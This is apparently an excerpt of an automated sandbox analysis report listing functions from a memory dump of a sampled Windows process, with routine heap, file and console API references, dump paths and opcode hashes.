Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$TimeWrite
String ID:
API String ID: 4019809305-0
Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
Instruction ID: 3da9f059d3bc814d8a505bba42161ef8f92b5d5c4a9eaced987106a50dc09be9
Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
Instruction Fuzzy Hash: D131C122A0874282FBA06B15B450379EBA0BF49B52FA4527DDD0D53FE5CFBCD854C620

Function 00007FF7823E8470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON

Download Yara Rule

APIs

wcstol.MSVCRT ref: 00007FF7823E848E
wcstol.MSVCRT ref: 00007FF7823E84A8
lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0 ref: 00007FF7823E853F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcstol$lstrcmp
String ID:
API String ID: 3515581199-0
Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
Instruction ID: fe0350bc71b218975c3e115c69ccdacf3f7c003035c8abe618f73bced4b07d5d
Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
Instruction Fuzzy Hash: 0021DC36F0874293E6606B79D464139EBA1FF49741FE56078CB4F43EA4CEACE449C620

Function 00007FF7823FE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FE836
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE855
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FE877
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE8AE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
Instruction ID: 0429a3c7fb78fdabe04ebd5097b80ba9f651f80460c3eb98939ff4fe5c70b7db
Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
Instruction Fuzzy Hash: 2D212F31A1874687EB547B11A41027DFAA1FB84B82FF44179D94E47B95CFBCE841CB21

Function 00007FF782401914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF78240196F

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7824019B3
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7824019D6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782401A01

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DriveNamePathTypeVolume
String ID:
API String ID: 1029679093-0
Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
Instruction ID: 92f75977243743235e416642b4b0d22a8b7efa97a3591a9f79424784f9657751
Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
Instruction Fuzzy Hash: 0E318D32B05B818AEB709F62D8943E8B7A0FB89B85F944035CA4D47B44DF7CDA85C720

Function 00007FF7823E7CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823E7D54
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823E7D68

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
Instruction ID: 9501b3d57d4bae5da748394033df777841a751370fa344e3a3c4326c81c091ff
Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
Instruction Fuzzy Hash: F721A765608B4196EA04AB56E51007AFBA1FF89BD2BA49134CE1E03B95DF7CE445C730

Function 00007FF7823D6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E3D0C
Part of subcall function 00007FF7823E3C24: towupper.MSVCRT ref: 00007FF7823E3D2F
Part of subcall function 00007FF7823E3C24: iswalpha.MSVCRT ref: 00007FF7823E3D4F
Part of subcall function 00007FF7823E3C24: towupper.MSVCRT ref: 00007FF7823E3D75
Part of subcall function 00007FF7823E3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3DBF

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823D6ABF
RtlFreeHeap.NTDLL ref: 00007FF7823D6AD3

Part of subcall function 00007FF7823D6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7823D6AE8,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B8B
Part of subcall function 00007FF7823D6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7823D6AE8,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B97
Part of subcall function 00007FF7823D6B84: RtlFreeHeap.NTDLL ref: 00007FF7823D6BAF

Part of subcall function 00007FF7823D6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D6AF1,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B39
Part of subcall function 00007FF7823D6B30: RtlFreeHeap.NTDLL ref: 00007FF7823D6B4D
Part of subcall function 00007FF7823D6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D6AF1,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B59

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823D6B03
RtlFreeHeap.NTDLL ref: 00007FF7823D6B17

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
String ID:
API String ID: 3512109576-0
Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
Instruction ID: f6d73ef160c3f89eb717c0651f905291ed42d34fda0d09525726b6400a516ec9
Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
Instruction Fuzzy Hash: 5B21B761909A4285EB04FB66E4143B8BBA0FF59B46FA48075CA0E07751DF7CE845C770

Function 00007FF7823DB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB6D0
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB6E7
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB701
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB715

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Process$AllocSize
String ID:
API String ID: 2549470565-0
Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
Instruction ID: a7fd67ad3b1dbf672da482765cbdd2bca0a08b9db6649024da461b6ecea9f216
Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
Instruction Fuzzy Hash: 1F218A65A09742D7EA54AB11E45407CFAA1FF44B82BE89475DA4E03F50DF7CE945C320

Function 00007FF7823FCFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD01C
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD033
FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD06D
SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD07F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
Instruction ID: de6de2ae812801f4b2c894766858642836a50032c6c44774fa09d1f592f4715b
Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
Instruction Fuzzy Hash: 1711B232618A4287DB449B21F01417AFBE0FB8AB96F905135EA8E47F94DF7CC485CB20

Function 00007FF7823D59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5A2E
_open_osfhandle.MSVCRT ref: 00007FF7823D5A4F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F37AA
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823F37D2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
String ID:
API String ID: 22757656-0
Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
Instruction ID: 5e1c85edb0c8fd209f37bb75830c523bb63cc1a6d088ac637f20483c8fe93e25
Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
Instruction Fuzzy Hash: 85119472A186458BE7506B24E45837DBAA0FB89B65FB44334D62E477D0CF7CD889CB20

Function 00007FF7823E9158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF7823E9163
RtlLookupFunctionEntry.NTDLL ref: 00007FF7823E9182
RtlVirtualUnwind.NTDLL ref: 00007FF7823E91CF
__raise_securityfailure.LIBCMT ref: 00007FF7823E9245

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
Instruction ID: 8de1dce44fccc6abd824279fd0f56ecb6458d010e88964758e1991ab4ff9c6ad
Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
Instruction Fuzzy Hash: 9821B735918B41D5E780AB05F880369B7B4FB88756FA00139EA8D47764DFBEE889C720

Function 00007FF7823F5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7823F5433,?,?,?,00007FF7823F69B8,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F56C5
RtlFreeHeap.NTDLL ref: 00007FF7823F56D9
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7823F5433,?,?,?,00007FF7823F69B8,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F56FD
RtlFreeHeap.NTDLL ref: 00007FF7823F5711

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
Instruction ID: 3d0682258b9adebaed305a728d0d801278772b6afd3a4b78ca74824b3ca4de52
Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
Instruction Fuzzy Hash: 7611F572A04B91C6EB009F56E4440A9BBA0FB89F85B999125DB4E03B18DF78E896C750

Function 00007FF7823E4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AD6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AEF

Part of subcall function 00007FF7823E4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
Part of subcall function 00007FF7823E4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
Part of subcall function 00007FF7823E4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
Part of subcall function 00007FF7823E4A14: memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
Part of subcall function 00007FF7823E4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823EEE64
RtlFreeHeap.NTDLL ref: 00007FF7823EEE78

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
String ID:
API String ID: 2759988882-0
Opcode ID: a4ed9730d3c6c81ba5f221eab6fcc823e7ba38e65aafe0768b810c3c56661ab8
Instruction ID: 9927794454a7677ecf028cc7f5836e7d9a76cd972e3e20d97afcafd7711261c6
Opcode Fuzzy Hash: a4ed9730d3c6c81ba5f221eab6fcc823e7ba38e65aafe0768b810c3c56661ab8
Instruction Fuzzy Hash: F1F04F64A15B4296EB44B766D414178EDD1FF8EB42BE8C078CD0E43740EE7CA848C730

Function 00007FF7823FF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FF235
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823FF249
_get_osfhandle.MSVCRT ref: 00007FF7823FF263
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823FF276

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
Instruction ID: f8fca250251c2bb4afede161027333b5ec1eeb5c629069a60297abae842b7148
Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
Instruction Fuzzy Hash: 63F01C36A28A42CBE7446B11E444279FE60FB8AB03F949274DA0F03394DF7CD488CB60

Function 00007FF7823DE420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762

Part of subcall function 00007FF7823DEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
Part of subcall function 00007FF7823DEF40: wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
Part of subcall function 00007FF7823DEF40: iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6

longjmp.MSVCRT ref: 00007FF7823ECCBC
longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ECCE0

Strings

GeToken: (%x) '%s', xrefs: 00007FF7823ECC39, 00007FF7823ECCF2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
String ID: GeToken: (%x) '%s'
API String ID: 3282654869-1994581435
